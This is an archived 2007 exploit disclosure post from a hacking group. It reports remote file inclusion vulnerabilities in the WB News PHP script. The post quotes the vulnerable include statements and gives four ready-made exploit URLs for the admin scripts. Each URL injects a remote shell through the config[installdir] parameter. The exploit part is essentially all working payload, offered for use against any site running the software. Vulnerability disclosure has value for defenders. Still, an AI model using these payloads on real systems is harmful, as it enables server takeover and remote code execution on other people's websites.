Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

SPAW Editor PHP Edition

vBulletin v3.6.5 admincp/index.php ( rss feed ) xss vuln.

Mani Admin Plugin Stats Reader V1.2 rfi :)

aWebNews v 1.1=>RFI

From:	ThE dE@Th <mostafa_ragab_(at)_msn.com>
Date:	02.03.2007
Subject:	WB News Remote File Include in all versions

ThE bug in admin file
*******************************************************************************
>>To ConTacT mE @ www.Asb-May.net/bb
>>ScRiPtS:-http://www.webmobo.com/wbnews/download.html
>>GrEaTz To:-ToOofa-HaCk.eGy (All AsB-MaY DisCoverY ExPloIts GrOup)
>>Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP} >>
******************************************************************************
>>comment.php:-
>>include $config['installdir']. "/includes/function.php";
>>themes.php:-
>>include $config['installdir']."/templates/".
$them['THEME_DIRECTORY']."/admin/theme_info.php";
>>directory.php:-
>>include $config['installdir']."/templates/".
$them['THEME_DIRECTORY']."/admin/theme_info.php";
>>sendmsg:-
>>include $config['installdir']."/templates/".
$them['THEME_DIRECTORY']."/admin/theme_info.php";
*******************************************************************************
>>ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/comment.
php?config[installdir]=[Shell]
>>ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/themes.
php?config[installdir]=[Shell]
>>ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/directory.
php?config[installdir]=[Shell]
>>ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/sendmsg.
php?config[installdir]=[Shell]

*******************************************************************************